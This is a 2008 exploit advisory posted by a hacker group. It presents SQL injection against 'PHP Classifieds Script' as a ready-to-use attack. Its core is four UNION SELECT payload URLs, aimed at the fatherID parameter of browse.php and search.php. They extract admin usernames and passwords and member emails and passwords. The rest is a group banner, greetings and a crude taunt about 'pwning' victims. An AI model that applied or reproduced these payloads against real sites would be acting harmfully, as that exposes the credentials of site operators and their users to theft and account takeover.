PHP Classifieds Script <= 05122008 SQL Injection Vulnerabilities

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : PHP Classifieds Script <= 05122008 SQL Injection Vulnerabilities
# Published : 2008-05-12
# Author : InjEctOr5
# Previous Title : Mega File Hosting Script 1.2 (fid) Remote SQL Injection Vulnerability
# Next Title : CMS Made Simple <= 1.2.4 (FileManager module) File Upload Exploit

||          ||   | ||        
                   o_,_7 _||  . _o_7 _|| 4_|_||  o_w_, 
                  ( :   /    (_)    /           (   .  
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
|     _                   __           __       __          ______     |
|   /'             __  /'__`        / __  /'__`       /  ___    |
|  /_,     ___   /_/_L     ___  ,_/ /   _ __  __/    |
|  /_/  /' _ ` / /_/__<_  /'___  /    /`'__ ___``  |
|       / /    / L / __/  _  _   / / L  |
|       _ _ __   ____/ ____\ __\ ____/ _   ____/ |
|       /_//_//_/ _ /___/  /____/ /__/ /___/  /_/   /___/  |
|                   ____/ >> Kings of injection                      |
|                   /___/                                             |
|                                                                      |
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|


<<!>> Found by  :  Cyb3r-1sT

<<!>> C0ntact :  t3tto0 [at] yahoo.com

                 cyb3r-1st [at] hotmail.com

<<!>> Groups : InjEctOr5 T3am 


=======================================================
+++++++++++++ R3membeR Kings of injection ++++++++++++++
=======================================================


<<->> script   : PHP Classifieds Script

<<->> download : www.phpclassifiedsscript.com  


=======================================================
++++++++++++++++ pwning ixxxxxx fuckers ++++++++++++++++
=======================================================


<<->> D0rk    : find it

<<->> Exploit :>>>>>>>>>

         <!> for admin inf0 ::: 
       >>>>>>>>>>>>>>>>>>>>>>>> www.site.me/browse.php?fatherID=-7+union+select+0,1,2,3,4,5,6,7,8,concat(username,0x3a,password),10+from+admin/*
       >>>>>>>>>>>>>>>>>>>>>>>> www.site.me/search.php?fatherID=-9999999+union+select+0,concat(username,0x3a,password),2,3,4,5,6,7,8,9,10+from+admin/*

        <!> for members inf0 ::: 
       >>>>>>>>>>>>>>>>>>>>>>>> www.site.me/browse.php?fatherID=-9999999+union%20select+0,1,2,3,4,5,6,7,8,concat(email,0x3a,password),10+from+members/*
       >>>>>>>>>>>>>>>>>>>>>>>> www.site.me/search.php?fatherID=-9999999+union+select+0,concat(email,0x3a,password),2,3,4,5,6,7,8,9,10+from+members/*


=======================================================
+++++++++++++++++++++++ Greetz ++++++++++++++++++++++++
=======================================================


<<->> My best freinds :: titanichacker $ arb-hawk $ denm0 $ drbaka  $ nicehacker 
                          anaconda-ksa $ sirus $ crazy-x  and all freinds

<<->> InjEctOr5 TeaM  


<<->> All muslims

# www.Syue.com [2008-05-12]